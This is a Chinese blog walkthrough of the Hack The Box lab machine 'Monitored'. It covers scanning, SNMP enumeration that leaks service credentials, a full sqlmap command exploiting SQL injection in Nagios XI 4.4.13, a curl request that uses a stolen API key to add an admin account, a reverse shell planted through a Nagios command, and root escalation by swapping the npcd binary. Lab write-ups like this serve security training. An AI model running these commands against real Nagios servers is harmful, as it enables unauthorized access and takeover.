Hack The Box-Monitored

端口扫描&信息收集

使用nmap对ip进行扫描

nmap 10.10.11.248

在这里插入图片描述

开放了22、80、389、443端口

使用dirsearch对网站目录进行扫描

dirsearch -u 10.10.11.248

在这里插入图片描述

发现一个/nagios的网页,尝试访问

在这里插入图片描述

发现需要用户名和密码,这里没有用户名密码,先继续下一步

将ip和域名加入到hosts文件中后,访问ip

echo '10.10.11.248		nagios.monitored.htb' >> /etc/hosts

在这里插入图片描述

点击进入验证界面

在这里插入图片描述

经过验证,不存在任意用户登录和弱口令等身份验证漏洞

回想起之前还有ladp协议,使用enum4linux检测是否存在信息泄露

enum4linux -l 10.10.11.248

其中,-l参数代表检测ldap协议是否存在未授权漏洞等

在这里插入图片描述

发现也不存在信息泄露

联想到ldap协议可能和snmp协议联动,这里也使用snmpwalk尝试一下snmp协议是否存在信息泄露,查找相关命令

https://wenku.baidu.com/view/2ebf7163e75c3b3567ec102de2bd960590c6d9ab.html?wkts=1705368859284&bdQuery=snmpwalk%E5%91%BD%E4%BB%A4

snmpwalk -c public -v 1 -m ALL 10.10.11.248 .1.3.6.1.2.1.25

参数.1.3.6.1.2.1.25代表着收集所有系统信息

在这里插入图片描述

发现存在用户名和密码泄露:svc/XjH7VCehowpR1xZB

使用用户名和密码登录之前的界面,发现还是登录失败

在这里插入图片描述

想起来之前爆破出的第一个登录界面,尝试登录

在这里插入图片描述

登录成功

在这里插入图片描述

获取权限

进入界面后发现Nagios的版本为4.4.13,存在如下SQL注入漏洞

在这里插入图片描述

该漏洞利用方式为:SQL注入获取到管理员api->利用管理员api新增用户

在命令行输入以下代码

sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ks https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi -T xi_users --dump

导出跑出的数据后,发现有admin用户的api值,接下去就需要利用此api来进行添加用户操作

在这里插入图片描述

利用POC,直接添加新用户到系统中

curl -k "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=adminz1&password=adminz1&name=Adminz1&email=adminz1@localhost&auth_level=admin"

在这里插入图片描述

可以看到新用户adminz1/adminz1已经添加成功,尝试登陆

在这里插入图片描述

四处寻找后,发现有一个可以添加命令的界面

Configure->Commands

在这里插入图片描述

添加一段反弹shell命令到其中

在这里插入图片描述

保存之后,在Monitoring->Hosts->localhost中调用shell

在这里插入图片描述

点击Run Check Command

在这里插入图片描述

拿到shell

权限提升

查看当前可执行的命令

在这里插入图片描述

发现能够以root用户执行npcd服务的开启和关闭,因此想到在npcd服务中加入一段反弹shell来提权

停止npcd服务

在这里插入图片描述

尝试直接修改npcd脚本的内容,发现其中为乱码,不好编辑,尝试本地写一个npcd,然后上传到靶机中

首先将原来的npcd服务备份

cd /usr/local/nagios/bin
mv npcd npcd1.bak

本地编辑好一段npcd的脚本,如下图所示

在这里插入图片描述
起一个http服务,将本地的npcd上传到靶机中,并赋予可执行权限

chmod +x npcd

在这里插入图片描述

执行重启npcd服务

sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd

在这里插入图片描述

提权成功

  • 33
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值